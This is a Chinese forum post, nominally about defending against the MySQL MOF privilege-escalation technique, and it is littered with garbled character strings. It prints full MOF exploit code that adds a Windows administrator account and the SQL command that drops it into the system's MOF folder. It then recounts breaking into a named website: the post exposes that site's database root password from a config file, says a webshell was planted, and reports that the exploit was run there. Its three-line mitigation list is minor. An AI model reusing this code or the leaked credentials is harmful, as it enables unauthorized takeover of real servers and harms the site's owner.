Mysql mof扩展漏洞防范方法
/ H$ P6 M8 Z0 V& @) Z# F5 y5 x; g2 J! w% C7 `7 f3 { p
网上公开的一些利用代码:1 |! e, h* E* h% u6 z" l, G
: ~' o1 e! q) v4 _- U
#pragma namespace(“\\\\.\\root\\subscription”)
+ a7 `! ]3 S6 w0 B2 m; L: u3 D7 J( C1 J4 P# ]* Q3 H3 k
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
1 z1 f% D J7 w/ h9 Y/ |
. h& L2 V) A1 u3 y" T, }& _3 d3 p # B# H4 Z9 {* I" _+ x# P
! ^( c4 q* l# C7 }% I. T9 K
4 ^8 l+ \4 Z" R' w& U7 r' j
* O; c, J, \, m: O! g4 p连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
2 D# M8 D) q) u. T从上面代码来看得出解决办法:5 g# T! x0 @- H" T7 V# z+ B
) ?3 I0 J; r3 W9 l, m1 c' p1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
7 N. k/ ~6 p/ T' J! W* C/ A) A
3 W5 |0 J% @+ {' [, P2、禁止使用”WScript.Shel”组件1 ]3 }) n4 [( q
P* m+ l/ V. z; R3 h3 n4 E+ F% ? ]
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER/ S; }- v6 Z( Y# l( q) q. Z
8 V: i9 @0 T. I7 N1 L2 J当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下4 F3 W1 Q' ~* Y: y& ^3 D
, l& u, ]* g, ^6 g( S* K7 d7 u- C i事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权+ {+ @# _( k. m
& `4 ^! u6 d0 y- n& f; L! t+ W但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容& z/ i4 n# M: G2 v- U
3 z0 \# l; _0 W' s3 ]) I8 |- U看懂了后就开始练手吧5 t6 P0 N E6 q. A* f9 f: @5 q
- z) [1 z2 S4 K
http://www.webbmw.com/config/config_ucenter.php 一句话 a
$ Y0 u$ K) g" o" F1 R: L$ }8 W: O& D5 ]4 D& ~. W
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。& \4 k | r% T i }# h* g& Q
J3 E2 S( l$ ^# N/ C2 u: Y: Y于是直接用菜刀开搞
+ n; h9 o" F1 ~1 n; @" p, |/ D6 Y* B9 R2 _9 N
上马先' W4 Y5 m& S% r& |) [, P
g: h2 a# q. y: m既然有了那些账号 之类的 于是我们就执行吧…….5 [7 O+ ~; I" i4 m$ x+ e7 |' H
3 p& |) q6 Y, { j* R
小小的说下& Q6 n- r3 b- @/ r
' g7 f9 l- ?" T' e+ |! W在这里第1次执行未成功 原因未知7 u' j( p# i3 _/ I# E3 s- q
+ S7 Q0 Q0 ], T- b/ C我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
' ^( @) d' R/ X* c { @& i$ v* y% q6 n, ^& k
#pragma namespace(“\\\\.\\root\\subscription”)4 H6 i a' c5 o- Y& c# q" H
" z" {: l% k, C4 g I5 ^2 T8 g
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };$ w( i/ G/ _3 y/ X2 T
0 h) ^" [: {% s8 h* l5 C
我是将文件放到C:\WINDOWS\temp\1.mof+ f) a! }" u- Y. j
- U4 a! X r9 m所以我们就改下执行的代码
5 d6 u; z5 a% S4 C) R, X, O
; n' _/ _% |7 Hselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;& d! {6 F8 M( y3 ^/ `) B, @$ ]
' Y) K9 |/ z7 S) [
+ Y8 a7 `; W* U8 {* Q. M" |* j
! f5 j* d# k, K但是 你会发现账号还是没有躺在那里。。
+ T! k3 I2 G7 J) l& {; L C, ]' ]0 ~4 V/ n: T) y. D/ P
于是我就感觉蛋疼6 i8 x' a% m# k/ E- C, k0 B5 k
* _4 V$ ?4 M, N6 u# y4 |就去一个一个去执行 但是执行到第2个 mysql时就成功了………
5 x! b# Q4 i$ Y5 \ ^" o, E& R4 e" ~ ~9 k
4 d! @8 F; a6 `9 A; K0 H% b
2 e0 E! d3 f i! d0 E. V' Y2 _但是其他库均不成功…, S% a F. a7 U1 g% p! g
; Z( K% ^" U1 h+ Z8 A Y
我就很费解呀 到底为什么不成功求大牛解答…
4 D+ [' N) u0 M: I7 \, c7 C* {! V: i3 S0 R
5 `+ l9 T* M4 B# O. X7 R* l
4 s( v$ Z- X. o7 h |